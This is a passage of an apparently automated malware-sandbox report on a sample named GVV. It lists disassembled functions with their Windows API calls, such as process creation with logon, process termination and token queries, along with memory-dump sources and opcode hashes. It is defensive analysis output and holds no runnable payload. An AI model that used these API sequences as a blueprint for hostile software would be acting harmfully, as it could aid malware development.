                • Opcode ID: 89834dad249323c9aca787938c6415f3f61a994d24834bc4746645e02a9ae4ef
                • Instruction ID: d30f218f457db060d8dabdea9dd22021732b8c4848e52ca2a8c180aa7ebdab3e
                • Opcode Fuzzy Hash: 89834dad249323c9aca787938c6415f3f61a994d24834bc4746645e02a9ae4ef
                • Instruction Fuzzy Hash: F181AD30208241AFCB14DF64D9D5E6ABBE5FF85308F14896CF4594B2A2DB31ED45CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0016F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                Download Yara Rule
                APIs
                • VariantInit.OLEAUT32(00000035), ref: 0016F7B9
                • SysAllocString.OLEAUT32(00000001), ref: 0016F860
                • VariantCopy.OLEAUT32(0016FA64,00000000), ref: 0016F889
                • VariantClear.OLEAUT32(0016FA64), ref: 0016F8AD
                • VariantCopy.OLEAUT32(0016FA64,00000000), ref: 0016F8B1
                • VariantClear.OLEAUT32(?), ref: 0016F8BB
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Variant$ClearCopy$AllocInitString
                • String ID:
                • API String ID: 3859894641-0
                • Opcode ID: 33deb49de6e745106adbac095fcb2164426811965ed1121dbd8f15279d85e370
                • Instruction ID: 5fc66cfc23db15c75581b9ee01c727426b8ded0ff0575d9bb3c6f557defed71e
                • Opcode Fuzzy Hash: 33deb49de6e745106adbac095fcb2164426811965ed1121dbd8f15279d85e370
                • Instruction Fuzzy Hash: 5B51D331600310BACF28AB65EC95B29B3A8EF55314F20847EFD06DF291DB708C52CB96
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0018910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00117620: _wcslen.LIBCMT ref: 00117625
                  • Part of subcall function 00116B57: _wcslen.LIBCMT ref: 00116B6A
                • GetOpenFileNameW.COMDLG32(00000058), ref: 001894E5
                • _wcslen.LIBCMT ref: 00189506
                • _wcslen.LIBCMT ref: 0018952D
                • GetSaveFileNameW.COMDLG32(00000058), ref: 00189585
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _wcslen$FileName$OpenSave
                • String ID: X
                • API String ID: 83654149-3081909835
                • Opcode ID: 7c94b43750d1d4a06151db88270c3d21a1cebe5cf9c2dfe75b3ace5c7531c633
                • Instruction ID: eb4d7d08c70d8e403d15f87f1f029fa9b68fbbe4be2b16f2f88c21c8d47e6457
                • Opcode Fuzzy Hash: 7c94b43750d1d4a06151db88270c3d21a1cebe5cf9c2dfe75b3ace5c7531c633
                • Instruction Fuzzy Hash: 31E1A4315083409FC718EF24D881AAAB7E1BF95314F08856DF8999B2A2DB31EE45CF91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0012920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00129BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00129BB2
                • BeginPaint.USER32(?,?,?), ref: 00129241
                • GetWindowRect.USER32(?,?), ref: 001292A5
                • ScreenToClient.USER32(?,?), ref: 001292C2
                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 001292D3
                • EndPaint.USER32(?,?,?,?,?), ref: 00129321
                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 001671EA
                  • Part of subcall function 00129339: BeginPath.GDI32(00000000), ref: 00129357
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                • String ID:
                • API String ID: 3050599898-0
                • Opcode ID: 18047050891caa8f7a271e114fd2f75034ac1d683ac2211399633f3c0f5e0c41
                • Instruction ID: f3a03e7a1bfe1d93c705584c77a5c98987153e293adf436bdba33b145ec9056c
                • Opcode Fuzzy Hash: 18047050891caa8f7a271e114fd2f75034ac1d683ac2211399633f3c0f5e0c41
                • Instruction Fuzzy Hash: 0B41BD70204250AFD720DF68DC84FBA7BF8FB56724F040629F9948B2E2C7309895DBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001807EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                Download Yara Rule
                APIs
                • InterlockedExchange.KERNEL32(?,000001F5), ref: 0018080C
                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00180847
                • EnterCriticalSection.KERNEL32(?), ref: 00180863
                • LeaveCriticalSection.KERNEL32(?), ref: 001808DC
                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 001808F3
                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00180921
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                • String ID:
                • API String ID: 3368777196-0
                • Opcode ID: 3d1f288548db4c7aa136ed7fe99d8ff43b630700e8e5603d9df747720cbc39eb
                • Instruction ID: f60f9554629d1c440a2c51b83ec138165571efc589c43b240e6d7979449f6db0
                • Opcode Fuzzy Hash: 3d1f288548db4c7aa136ed7fe99d8ff43b630700e8e5603d9df747720cbc39eb
                • Instruction Fuzzy Hash: 65414C71A00209EFDF15AF54DC85AAA77B8FF09310F1540B9ED04AA296D730DEA5DFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A81DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                Download Yara Rule
                APIs
                • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0016F3AB,00000000,?,?,00000000,?,0016682C,00000004,00000000,00000000), ref: 001A824C
                • EnableWindow.USER32(00000000,00000000), ref: 001A8272
                • ShowWindow.USER32(FFFFFFFF,00000000), ref: 001A82D1
                • ShowWindow.USER32(00000000,00000004), ref: 001A82E5
                • EnableWindow.USER32(00000000,00000001), ref: 001A830B
                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 001A832F
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$Show$Enable$MessageSend
                • String ID:
                • API String ID: 642888154-0
                • Opcode ID: cc5063c892f25912aec8bd8498c3d4b646d4b4abe607e27cd7036222cb55ad87
                • Instruction ID: 2aa4b29f83597f78a0269fc71a9122d52056b03681d4c736ab866fd04cbeb2e8
                • Opcode Fuzzy Hash: cc5063c892f25912aec8bd8498c3d4b646d4b4abe607e27cd7036222cb55ad87
                • Instruction Fuzzy Hash: F841A138601644EFDF25CF54D899BE87BF1BF0BB14F1841A9E6484F2A2CB31A881CB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00174C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                Download Yara Rule
                APIs
                • IsWindowVisible.USER32(?), ref: 00174C95
                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00174CB2
                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00174CEA
                • _wcslen.LIBCMT ref: 00174D08
                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00174D10
                • _wcsstr.LIBVCRUNTIME ref: 00174D1A
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                • String ID:
                • API String ID: 72514467-0
                • Opcode ID: fcba7c8298bee4aa4f665d8d9e5f9ff4493b8a9f170f899d27a125e81916a24c
                • Instruction ID: 5bb40ace1f1cb85292e98c5214e1903170ec0fe88aee89dfb08b346d52b99915
                • Opcode Fuzzy Hash: fcba7c8298bee4aa4f665d8d9e5f9ff4493b8a9f170f899d27a125e81916a24c
                • Instruction Fuzzy Hash: 5B21D771204210BBEB269B79EC49EBB7BBCDF56760F11807DF80DCA191EB61DC4196A0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0018581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00113AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00113A97,?,?,00112E7F,?,?,?,00000000), ref: 00113AC2
                • _wcslen.LIBCMT ref: 0018587B
                • CoInitialize.OLE32(00000000), ref: 00185995
                • CoCreateInstance.OLE32(001AFCF8,00000000,00000001,001AFB68,?), ref: 001859AE
                • CoUninitialize.OLE32 ref: 001859CC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                • String ID: .lnk
                • API String ID: 3172280962-24824748
                • Opcode ID: fbd8c47094eb2d32b77916d8c4d04df8d15ba020eb0638f4a50878993dc622b2
                • Instruction ID: 45203284b0b464b2230eb994fd0dc7c51f993031a075a4b963476dd2dc27272f
                • Opcode Fuzzy Hash: fbd8c47094eb2d32b77916d8c4d04df8d15ba020eb0638f4a50878993dc622b2
                • Instruction Fuzzy Hash: 18D14475A086019FC718EF24C480A6ABBE2EF99714F14486DF8899B361D731EE45CF92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00170FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00170FCA
                  • Part of subcall function 00170FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00170FD6
                  • Part of subcall function 00170FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00170FE5
                  • Part of subcall function 00170FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00170FEC
                  • Part of subcall function 00170FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00171002
                • GetLengthSid.ADVAPI32(?,00000000,00171335), ref: 001717AE
                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 001717BA
                • HeapAlloc.KERNEL32(00000000), ref: 001717C1
                • CopySid.ADVAPI32(00000000,00000000,?), ref: 001717DA
                • GetProcessHeap.KERNEL32(00000000,00000000,00171335), ref: 001717EE
                • HeapFree.KERNEL32(00000000), ref: 001717F5
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                • String ID:
                • API String ID: 3008561057-0
                • Opcode ID: 6434c0b6b8c923757f04cd3027fb43dbac89dc0c62d6525ff2217ffd97b82b8f
                • Instruction ID: 602eb46951015a45c7275813d8f4950d76a57bddc8780772e31d437d222d8ad4
                • Opcode Fuzzy Hash: 6434c0b6b8c923757f04cd3027fb43dbac89dc0c62d6525ff2217ffd97b82b8f
                • Instruction Fuzzy Hash: 7E119072600205FFDB189FA8CD49BAF7BB9EF46355F10C018F44597210D735A984CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001714CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                Download Yara Rule
                APIs
                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 001714FF
                • OpenProcessToken.ADVAPI32(00000000), ref: 00171506
                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00171515
                • CloseHandle.KERNEL32(00000004), ref: 00171520
                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0017154F
                • DestroyEnvironmentBlock.USERENV(00000000), ref: 00171563
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                • String ID:
                • API String ID: 1413079979-0
                • Opcode ID: 697374fd56834e8d4284370ff45b77f9ccea9b8ee1ea8fc9012a4a443076d30b
                • Instruction ID: f79ab729a1f840a8f5147e87cb706244aaa59f4c3b0071c2d657eae0e3fff59d
                • Opcode Fuzzy Hash: 697374fd56834e8d4284370ff45b77f9ccea9b8ee1ea8fc9012a4a443076d30b
                • Instruction Fuzzy Hash: A9112976504209BBDF118F98DE49BDE7BB9EF49744F048015FA09A2160C3758EA4DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00133382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetLastError.KERNEL32(?,?,00133379,00132FE5), ref: 00133390
                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0013339E
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001333B7
                • SetLastError.KERNEL32(00000000,?,00133379,00132FE5), ref: 00133409
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ErrorLastValue___vcrt_
                • String ID:
                • API String ID: 3852720340-0
                • Opcode ID: 45a1a6dc830f161a9047be8e336ca6b9d8a4134a6403a6970d06990e59212046
                • Instruction ID: 0361914d7e5f495f6614d5e0e9e8c5c2d4439a959d2dc25685e0dd53be6851c5
                • Opcode Fuzzy Hash: 45a1a6dc830f161a9047be8e336ca6b9d8a4134a6403a6970d06990e59212046
                • Instruction Fuzzy Hash: 0A01D43360A312BEEA2927757CC6666AB95FB25379F20822AF430852F0EF114E45959C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00142D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetLastError.KERNEL32(?,?,00145686,00153CD6,?,00000000,?,00145B6A,?,?,?,?,?,0013E6D1,?,001D8A48), ref: 00142D78
                • _free.LIBCMT ref: 00142DAB
                • _free.LIBCMT ref: 00142DD3
                • SetLastError.KERNEL32(00000000,?,?,?,?,0013E6D1,?,001D8A48,00000010,00114F4A,?,?,00000000,00153CD6), ref: 00142DE0
                • SetLastError.KERNEL32(00000000,?,?,?,?,0013E6D1,?,001D8A48,00000010,00114F4A,?,?,00000000,00153CD6), ref: 00142DEC
                • _abort.LIBCMT ref: 00142DF2
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ErrorLast$_free$_abort
                • String ID:
                • API String ID: 3160817290-0
                • Opcode ID: 96dbb66944ee2abb55ceb5188771ffcb2e7ad45cde2cc640ba4bae4e3027aac3
                • Instruction ID: f53e79e74581891af96d2ebe00ca5d6160f5bf61735f5e8635641be5a267c08c
                • Opcode Fuzzy Hash: 96dbb66944ee2abb55ceb5188771ffcb2e7ad45cde2cc640ba4bae4e3027aac3
                • Instruction Fuzzy Hash: 09F04C31D05A1167C61273B5BC0AF1F265ABFD27B0F650519F824D31F2EF7088C141A0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00129639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00129693
                  • Part of subcall function 00129639: SelectObject.GDI32(?,00000000), ref: 001296A2
                  • Part of subcall function 00129639: BeginPath.GDI32(?), ref: 001296B9
                  • Part of subcall function 00129639: SelectObject.GDI32(?,00000000), ref: 001296E2
                • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 001A8A4E
                • LineTo.GDI32(?,00000003,00000000), ref: 001A8A62
                • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 001A8A70
                • LineTo.GDI32(?,00000000,00000003), ref: 001A8A80
                • EndPath.GDI32(?), ref: 001A8A90
                • StrokePath.GDI32(?), ref: 001A8AA0
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                • String ID:
                • API String ID: 43455801-0
                • Opcode ID: b2e04ccfa0a9b53d3f9d538051bb53270228fd49e6a0020886b7253b7e90d281
                • Instruction ID: 6d84b271374f59f5244ce0c19b6f00e3a3ac83f7f3db4ad8afa6c41267a4abbc
                • Opcode Fuzzy Hash: b2e04ccfa0a9b53d3f9d538051bb53270228fd49e6a0020886b7253b7e90d281
                • Instruction Fuzzy Hash: 41111B7A00014CFFDF129F94DC88EAA7F6CEB09354F008012BA199A5A1C7719D95DFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001751FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                Download Yara Rule
                APIs
                • GetDC.USER32(00000000), ref: 00175218
                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00175229
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00175230
                • ReleaseDC.USER32(00000000,00000000), ref: 00175238
                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0017524F
                • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00175261
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CapsDevice$Release
                • String ID:
                • API String ID: 1035833867-0
                • Opcode ID: 65885af72156d627211992919e95cd27926315d71fd8a763b028077bc8e4dbfa
                • Instruction ID: f3c25c3d88ce2fe4f65224416d8d66846f082e35149e6f7e9a3b89b06fce5c14
                • Opcode Fuzzy Hash: 65885af72156d627211992919e95cd27926315d71fd8a763b028077bc8e4dbfa
                • Instruction Fuzzy Hash: 2F014F75A00718BBEB109BA59C49A5EBFB9EB49751F044065FA08A7781D6709C00CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00111BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                Download Yara Rule
                APIs
                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00111BF4
                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00111BFC
                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00111C07
                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00111C12
                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00111C1A
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00111C22
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Virtual
                • String ID:
                • API String ID: 4278518827-0
                • Opcode ID: 13951068dc042801aa99f6873b555ab6b6ff04791f3969a0da53c4c956c5386a
                • Instruction ID: d117ab98a09e689fee3027a253f2e60b82a5aa80edc197e0cb47c8bd3e5e7006
                • Opcode Fuzzy Hash: 13951068dc042801aa99f6873b555ab6b6ff04791f3969a0da53c4c956c5386a
                • Instruction Fuzzy Hash: 2B016CB09027597DE3008F5A8C85B52FFE8FF19354F04411B915C47A41C7F5A864CBE5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                Download Yara Rule
                APIs
                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0017EB30
                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0017EB46
                • GetWindowThreadProcessId.USER32(?,?), ref: 0017EB55
                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0017EB64
                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0017EB6E
                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0017EB75
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
